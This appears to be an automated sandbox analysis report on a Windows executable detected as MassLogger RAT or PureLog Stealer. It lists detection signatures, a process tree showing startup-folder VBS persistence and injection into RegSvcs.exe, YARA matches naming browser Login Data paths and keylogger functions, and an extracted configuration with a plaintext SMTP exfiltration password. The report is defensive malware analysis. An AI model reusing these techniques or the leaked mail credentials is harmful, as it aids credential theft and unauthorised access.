Edit tour

Windows Analysis Report
CvzLvta2bG.exe

Overview

General Information

Sample name:	CvzLvta2bG.exe renamed because original name is a hash value
Original sample name:	9880b5e431d9441856a10a0031353a164aa3d792474912f9c96796092978ad40.exe
Analysis ID:	1587975
MD5:	61a2f4563666bdbf6d6ce0ec58f57c64
SHA1:	b2cbeba9b074991e13df15c90a4dfc445b4875a4
SHA256:	9880b5e431d9441856a10a0031353a164aa3d792474912f9c96796092978ad40
Tags:	exeRedLineStealeruser-adrian__luca
Infos:

Detection

MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Drops VBS files to the startup folder

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

CvzLvta2bG.exe (PID: 6576 cmdline: "C:\Users\user\Desktop\CvzLvta2bG.exe" MD5: 61A2F4563666BDBF6D6CE0EC58F57C64)

definitiveness.exe (PID: 6632 cmdline: "C:\Users\user\Desktop\CvzLvta2bG.exe" MD5: 61A2F4563666BDBF6D6CE0EC58F57C64)

RegSvcs.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\CvzLvta2bG.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 6824 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

definitiveness.exe (PID: 6876 cmdline: "C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe" MD5: 61A2F4563666BDBF6D6CE0EC58F57C64)

RegSvcs.exe (PID: 6900 cmdline: "C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "sendxpreview@ypcog.shop", "Password": "k4T*5ia*ES", "Server": "ypcog.shop", "To": "preview@ypcog.shop", "Port": 587}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2373788703.00000000010C0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C2 88 44 24 2B 88 44 24 2F B0 79 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x21bc4:$a1: get_encryptedPassword 0x49afc:$a1: get_encryptedPassword 0x21b98:$a2: get_encryptedUsername 0x49ad0:$a2: get_encryptedUsername 0x21c5c:$a3: get_timePasswordChanged 0x49b94:$a3: get_timePasswordChanged 0x21b74:$a4: get_passwordField 0x49aac:$a4: get_passwordField 0x21bda:$a5: set_encryptedPassword 0x49b12:$a5: set_encryptedPassword 0x219a7:$a7: get_logins 0x498df:$a7: get_logins 0x20f15:$a8: GetOutlookPasswords 0x48e4d:$a8: GetOutlookPasswords 0x20429:$a9: StartKeylogger 0x48361:$a9: StartKeylogger 0x1ee83:$a10: KeyLoggerEventArgs 0x46dbb:$a10: KeyLoggerEventArgs 0x1ee52:$a11: KeyLoggerEventArgsEventHandler 0x46d8a:$a11: KeyLoggerEventArgsEventHandler 0x21a7b:$a13: _encryptedPassword
00000007.00000002.3599294917.00000000036A4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c664:$a1: get_encryptedPassword 0x1c638:$a2: get_encryptedUsername 0x1c6fc:$a3: get_timePasswordChanged 0x1c614:$a4: get_passwordField 0x1c67a:$a5: set_encryptedPassword 0x1c447:$a7: get_logins 0x1b9b5:$a8: GetOutlookPasswords 0x1aec9:$a9: StartKeylogger 0x19923:$a10: KeyLoggerEventArgs 0x198f2:$a11: KeyLoggerEventArgsEventHandler 0x1c51b:$a13: _encryptedPassword
00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20d53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20251:$a3: \Google\Chrome\User Data\Default\Login Data 0x2055f:$a4: \Orbitum\User Data\Default\Login Data 0x21357:$a5: \Kometa\User Data\Default\Login Data
00000003.00000002.3599413554.00000000031A4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5e052:$a1: get_encryptedPassword 0x5e026:$a2: get_encryptedUsername 0x5e0ea:$a3: get_timePasswordChanged 0x5e002:$a4: get_passwordField 0x5e068:$a5: set_encryptedPassword 0x5de35:$a7: get_logins 0x5d3a3:$a8: GetOutlookPasswords 0x5c8b7:$a9: StartKeylogger 0x5b311:$a10: KeyLoggerEventArgs 0x5b2e0:$a11: KeyLoggerEventArgsEventHandler 0x5df09:$a13: _encryptedPassword
00000006.00000002.2490143764.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C2 88 44 24 2B 88 44 24 2F B0 79 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d54c:$a1: get_encryptedPassword 0x1d520:$a2: get_encryptedUsername 0x1d5e4:$a3: get_timePasswordChanged 0x1d4fc:$a4: get_passwordField 0x1d562:$a5: set_encryptedPassword 0x1d32f:$a7: get_logins 0x1c89d:$a8: GetOutlookPasswords 0x1bdb1:$a9: StartKeylogger 0x1a80b:$a10: KeyLoggerEventArgs 0x1a7da:$a11: KeyLoggerEventArgsEventHandler 0x1d403:$a13: _encryptedPassword
00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21c3b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21139:$a3: \Google\Chrome\User Data\Default\Login Data 0x21447:$a4: \Orbitum\User Data\Default\Login Data 0x2223f:$a5: \Kometa\User Data\Default\Login Data
Process Memory Space: RegSvcs.exe PID: 6672	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 6672	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 6672	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 6672	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 6672	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x46037:$a1: get_encryptedPassword 0x66e56:$a1: get_encryptedPassword 0x4600b:$a2: get_encryptedUsername 0x66e2a:$a2: get_encryptedUsername 0x460cf:$a3: get_timePasswordChanged 0x66eee:$a3: get_timePasswordChanged 0x45fe7:$a4: get_passwordField 0x66e06:$a4: get_passwordField 0x4604d:$a5: set_encryptedPassword 0x66e6c:$a5: set_encryptedPassword 0x45e23:$a7: get_logins 0x66c42:$a7: get_logins 0x453fb:$a8: GetOutlookPasswords 0x6621a:$a8: GetOutlookPasswords 0x449cb:$a9: StartKeylogger 0x657ea:$a9: StartKeylogger 0x43544:$a10: KeyLoggerEventArgs 0x64363:$a10: KeyLoggerEventArgs 0x43513:$a11: KeyLoggerEventArgsEventHandler 0x64332:$a11: KeyLoggerEventArgsEventHandler 0x45eee:$a13: _encryptedPassword
Process Memory Space: RegSvcs.exe PID: 6900	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 6900	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 6900	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 6900	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 6900	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x56ae:$a1: get_encryptedPassword 0x3f7c4:$a1: get_encryptedPassword 0x5682:$a2: get_encryptedUsername 0x3f798:$a2: get_encryptedUsername 0x5746:$a3: get_timePasswordChanged 0x3f85c:$a3: get_timePasswordChanged 0x565e:$a4: get_passwordField 0x3f774:$a4: get_passwordField 0x56c4:$a5: set_encryptedPassword 0x3f7da:$a5: set_encryptedPassword 0x549a:$a7: get_logins 0x3f5b0:$a7: get_logins 0x4a72:$a8: GetOutlookPasswords 0x3eb6a:$a8: GetOutlookPasswords 0x4042:$a9: StartKeylogger 0x3e0e8:$a9: StartKeylogger 0x2bbb:$a10: KeyLoggerEventArgs 0x3cbb2:$a10: KeyLoggerEventArgs 0x2b8a:$a11: KeyLoggerEventArgsEventHandler 0x3cb81:$a11: KeyLoggerEventArgsEventHandler 0x5565:$a13: _encryptedPassword
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.RegSvcs.exe.5ab0000.5.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.5ab0000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.5ab0000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.5ab0000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.5ab0000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c664:$a1: get_encryptedPassword 0x1c638:$a2: get_encryptedUsername 0x1c6fc:$a3: get_timePasswordChanged 0x1c614:$a4: get_passwordField 0x1c67a:$a5: set_encryptedPassword 0x1c447:$a7: get_logins 0x1b9b5:$a8: GetOutlookPasswords 0x1aec9:$a9: StartKeylogger 0x19923:$a10: KeyLoggerEventArgs 0x198f2:$a11: KeyLoggerEventArgsEventHandler 0x1c51b:$a13: _encryptedPassword
7.2.RegSvcs.exe.5ab0000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20d53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20251:$a3: \Google\Chrome\User Data\Default\Login Data 0x2055f:$a4: \Orbitum\User Data\Default\Login Data 0x21357:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.2e60000.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.2e60000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.2e60000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.2e60000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2e60000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d54c:$a1: get_encryptedPassword 0x1d520:$a2: get_encryptedUsername 0x1d5e4:$a3: get_timePasswordChanged 0x1d4fc:$a4: get_passwordField 0x1d562:$a5: set_encryptedPassword 0x1d32f:$a7: get_logins 0x1c89d:$a8: GetOutlookPasswords 0x1bdb1:$a9: StartKeylogger 0x1a80b:$a10: KeyLoggerEventArgs 0x1a7da:$a11: KeyLoggerEventArgsEventHandler 0x1d403:$a13: _encryptedPassword
3.2.RegSvcs.exe.2e60000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21c3b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21139:$a3: \Google\Chrome\User Data\Default\Login Data 0x21447:$a4: \Orbitum\User Data\Default\Login Data 0x2223f:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.2e60000.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.2e60000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.2e60000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.2e60000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2e60000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b74c:$a1: get_encryptedPassword 0x1b720:$a2: get_encryptedUsername 0x1b7e4:$a3: get_timePasswordChanged 0x1b6fc:$a4: get_passwordField 0x1b762:$a5: set_encryptedPassword 0x1b52f:$a7: get_logins 0x1aa9d:$a8: GetOutlookPasswords 0x19fb1:$a9: StartKeylogger 0x18a0b:$a10: KeyLoggerEventArgs 0x189da:$a11: KeyLoggerEventArgsEventHandler 0x1b603:$a13: _encryptedPassword
3.2.RegSvcs.exe.2e60000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1fe3b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f339:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f647:$a4: \Orbitum\User Data\Default\Login Data 0x2043f:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.44e6560.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.44e6560.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.44e6560.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.44e6560.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.44e6560.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a864:$a1: get_encryptedPassword 0x1a838:$a2: get_encryptedUsername 0x1a8fc:$a3: get_timePasswordChanged 0x1a814:$a4: get_passwordField 0x1a87a:$a5: set_encryptedPassword 0x1a647:$a7: get_logins 0x19bb5:$a8: GetOutlookPasswords 0x190c9:$a9: StartKeylogger 0x17b23:$a10: KeyLoggerEventArgs 0x17af2:$a11: KeyLoggerEventArgsEventHandler 0x1a71b:$a13: _encryptedPassword
7.2.RegSvcs.exe.44e6560.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1ef53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e451:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e75f:$a4: \Orbitum\User Data\Default\Login Data 0x1f557:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.44e5678.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.44e5678.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.44e5678.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.44e5678.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.44e5678.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b74c:$a1: get_encryptedPassword 0x1b720:$a2: get_encryptedUsername 0x1b7e4:$a3: get_timePasswordChanged 0x1b6fc:$a4: get_passwordField 0x1b762:$a5: set_encryptedPassword 0x1b52f:$a7: get_logins 0x1aa9d:$a8: GetOutlookPasswords 0x19fb1:$a9: StartKeylogger 0x18a0b:$a10: KeyLoggerEventArgs 0x189da:$a11: KeyLoggerEventArgsEventHandler 0x1b603:$a13: _encryptedPassword
7.2.RegSvcs.exe.44e5678.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1fe3b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f339:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f647:$a4: \Orbitum\User Data\Default\Login Data 0x2043f:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.2e60ee8.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.2e60ee8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.2e60ee8.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.2e60ee8.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2e60ee8.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c664:$a1: get_encryptedPassword 0x1c638:$a2: get_encryptedUsername 0x1c6fc:$a3: get_timePasswordChanged 0x1c614:$a4: get_passwordField 0x1c67a:$a5: set_encryptedPassword 0x1c447:$a7: get_logins 0x1b9b5:$a8: GetOutlookPasswords 0x1aec9:$a9: StartKeylogger 0x19923:$a10: KeyLoggerEventArgs 0x198f2:$a11: KeyLoggerEventArgsEventHandler 0x1c51b:$a13: _encryptedPassword
3.2.RegSvcs.exe.2e60ee8.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20d53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20251:$a3: \Google\Chrome\User Data\Default\Login Data 0x2055f:$a4: \Orbitum\User Data\Default\Login Data 0x21357:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.2c10b06.0.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.2c10b06.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.2c10b06.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.2c10b06.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2c10b06.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d54c:$a1: get_encryptedPassword 0x1d520:$a2: get_encryptedUsername 0x1d5e4:$a3: get_timePasswordChanged 0x1d4fc:$a4: get_passwordField 0x1d562:$a5: set_encryptedPassword 0x1d32f:$a7: get_logins 0x1c89d:$a8: GetOutlookPasswords 0x1bdb1:$a9: StartKeylogger 0x1a80b:$a10: KeyLoggerEventArgs 0x1a7da:$a11: KeyLoggerEventArgsEventHandler 0x1d403:$a13: _encryptedPassword
3.2.RegSvcs.exe.2c10b06.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21c3b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21139:$a3: \Google\Chrome\User Data\Default\Login Data 0x21447:$a4: \Orbitum\User Data\Default\Login Data 0x2223f:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.5ab0000.5.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.5ab0000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.5ab0000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.5ab0000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.5ab0000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a864:$a1: get_encryptedPassword 0x1a838:$a2: get_encryptedUsername 0x1a8fc:$a3: get_timePasswordChanged 0x1a814:$a4: get_passwordField 0x1a87a:$a5: set_encryptedPassword 0x1a647:$a7: get_logins 0x19bb5:$a8: GetOutlookPasswords 0x190c9:$a9: StartKeylogger 0x17b23:$a10: KeyLoggerEventArgs 0x17af2:$a11: KeyLoggerEventArgsEventHandler 0x1a71b:$a13: _encryptedPassword
7.2.RegSvcs.exe.5ab0000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1ef53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e451:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e75f:$a4: \Orbitum\User Data\Default\Login Data 0x1f557:$a5: \Kometa\User Data\Default\Login Data
6.2.definitiveness.exe.1b50000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C2 88 44 24 2B 88 44 24 2F B0 79 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.RegSvcs.exe.450e498.4.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.450e498.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.450e498.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.450e498.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
